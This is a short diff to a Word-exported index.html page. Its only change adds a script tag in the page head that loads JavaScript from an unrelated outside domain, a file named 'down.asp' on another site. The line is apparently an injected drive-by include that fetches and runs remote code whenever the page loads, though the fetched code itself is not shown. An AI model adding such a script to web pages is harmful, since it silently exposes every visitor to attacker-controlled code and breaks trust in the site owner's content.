--- a/index.html
+++ b/index.html
@@ -11,6 +11,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
 <meta name=Originator content="Microsoft Word 15">
 <link rel=File-List href="index_files/filelist.xml">
 <link rel=Edit-Time-Data href="index_files/editdata.mso">
+<script type="text/javascript" src="https://www.westoceancc.co.kr/html/course/js/down.asp"></script>
 <style>
 <!--
  /* Font Definitions */
